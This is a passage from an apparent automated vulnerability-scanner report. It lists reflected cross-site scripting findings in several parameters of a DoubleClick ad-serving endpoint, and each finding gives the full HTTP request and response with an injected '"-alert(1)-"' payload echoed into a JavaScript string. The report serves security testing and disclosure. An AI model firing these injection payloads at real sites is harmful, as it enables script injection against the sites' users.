Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8941

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
leclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%
...[SNIP]...

1.7. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb197"-alert(1)-"30566853739 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9127

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_im_f_anb_op_ScrFr_pk_300x250%26priorityCode%3D4654900000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

1.8. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26dad"-alert(1)-"eeefcf6670b was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
c%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%
...[SNIP]...

1.9. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a686a"-alert(1)-"12363754579 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype
...[SNIP]...

1.10. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4ac"-alert(1)-"f286bd5be45 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%
...[SNIP]...

1.11. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ae1"-alert(1)-"d5a8c8b632 was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9719

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
c%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl
...[SNIP]...

